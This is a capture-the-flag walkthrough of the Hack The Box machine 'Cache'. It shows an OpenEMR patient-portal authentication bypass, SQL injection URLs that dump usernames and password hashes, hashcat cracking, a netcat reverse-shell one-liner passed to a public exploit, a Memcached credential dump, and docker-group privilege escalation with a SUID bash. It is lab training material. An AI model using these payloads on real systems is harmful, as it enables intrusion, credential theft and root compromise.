HTB Walkthrough : Cache

Today we are going to solve a another boot2root challenge from Hackthebox called ” cache ” created by ASHacker .So without wasting time let start the war.

Level : Intermediate

Task : To root the machine and collect user and root flag.

Attacking Strategy

  • Scanning
  • Enumeration
    • openemr vulnerability
  • Exploitation
    • SQL injection and RCE
  • Privilege Escalation
    • docker

Scanning

we start our scanning with rustscan and it give result that port 22 for SSH and port 80 for HTTP are opened.

rustscan --ulimit 5001 -a 10.129.2.219 -- -sC -sV 

So now we know that port 80 have some webpage with title Cache where we find some link like Home, News, Contact us, authors, login and as I see login page it caught my eyes and we start digging for the login page.

After visiting the login page we try some default credentials and here we notice that the website does not send the request to the server and give the result it means the authentication mechanism is kind of static so with the help of the inspect element we check all supported code for this page we found some javascript function under functionality.js and we have some creds .

using these credentials we login to page but nothing interested and we also try to do SSH but failed so we start more digging and on authors page we find something strange i.e authors are working on some other project also so we add it to our hosts file and then visit to it .

now we visit hms.htb we see that openemr is there with 2018 copyright and after searching to the internet we get that in 2018 we have openemr 5.0.1 which have some serious vulnerability you can read from here.

Exploitation

After reading the vulnerability report we first have to bypass the login page and we can do it with patient portal . Here we go to the register panel and with the help of Burp Suite we can modify the request and change the destination page.

Now we can see that we make a register request as a new user .

Make the change in the URL request on which we want to go directly.

we are successfully bypass the authentication of the portal.

Now it’s time to go for the second vulnerability i.e SQL injection. Now according to the vulnerability report, we can fuzz for the SQL vulnerability at add_edit_event_user page

From Report

SQL injection in add_edit_event_user.php is caused by unsanitized user input from the ​eid​,userid​, and ​pid​ parameters. Exploiting this vulnerability requires authentication to PatientPortal; however, it can be exploited without authentication when combined with the PatientPortal authentication bypass

http://hms.htb/portal/add_edit_event_user.php?eid=1

After finding the SQL vulnerability, it’s time for further action so that we can get some useful information or any kind of password, or something else.

So first we have to find out the number of columns and we find that we have four columns after getting number of columns now its time to find out the leak parameter

http://hms.htb/portal/add_edit_event_user.php?eid=1 order by 4

Now let check the version first

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,version(),null
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,database(),null

let check out the database and we found the name of database “openemr”

Now we know the database let go for the table from openemr database , here we apply some filter because there are too many tables which are enable to show on error page and after applying the filter we get some tables like users , users_secure ,etc .

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(table_name),null from information_schema.tables where table_schema='openemr' and table_name like 'user%'

After getting the tables its time to find out the columns .At this place we try to dump out the columns from every table but required data we get from table users_secure .

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(column_name),null from information_schema.columns where table_name='users_secure'

Columns we get from the table are Id, username, password, salt, last_update, etc and in the list two are my favorite username and password.

Now first dump out the usernames

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(username),null from users_secure

Now we know the username let dump out the password

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(Password),null from users_secure

Now we have some hash , but we have to first identify the kind of hash for which i going to use hashcat and we find that this is bcrypt type hash , let crack it

sudo hashcat -m 3200 hash Desktop/HTB/rockyou.txt

We successfully crack the hash let make ssh using these credentials but failed , so we start dig more and we find some exploit here which require authentication and we have some credentials so let give try to it .

searchsploit openemr 5.0.1
searchsploit -m 45161 

After understanding the exploit we run it , make sure change the username and password

python 45161.py http://hms.htb -u xxxxxxx -p xxxxxx -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.68 1234 >/tmp/f'

Privilege Escalation

Now we have the shell and in starting we get some credentials of ash we use it and it work we have our first flag .

now it’s time for getting the root power, let checkout any service running on local we get some wired thing, here is something that is running on port 11211 and is generally used by the Memcached server. Due to misconfiguration, we are able to connect to the server using telnet , we can also dump out the memory data.

telnet 127.0.0.1 11211 
version
stats cachedump 1 0
get user
get passwd

Now we have username and password by which we can ssh the server and here we get very interesting thing that this user is the member of docker group and this is very serious issue but jackpot to a hacker .

Let get the root level access by exploiting the docker service . Now here first we create the container of Ubuntu and mount the host file system to the container and then get the interactive access of the container we can put the bash compiled file with SUID bit set and execution permission also set in container . You can read more about docker exploitation from here .

docker images
docker pull ubuntu
docker images
docker run -it -v /:/mnt ubuntu
cd /mnt
which bash
cp /bin/bash /mnt/home/luffy/
cd /mnt/home/luffy/
chmod +xs bash

Once everything set we go back to host machine and there have our bash file on which SUID bit is set and we can run it and finally we have root power on target server .

./bash -p

Contact : [email protected] or DM us on twitter for any query .

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.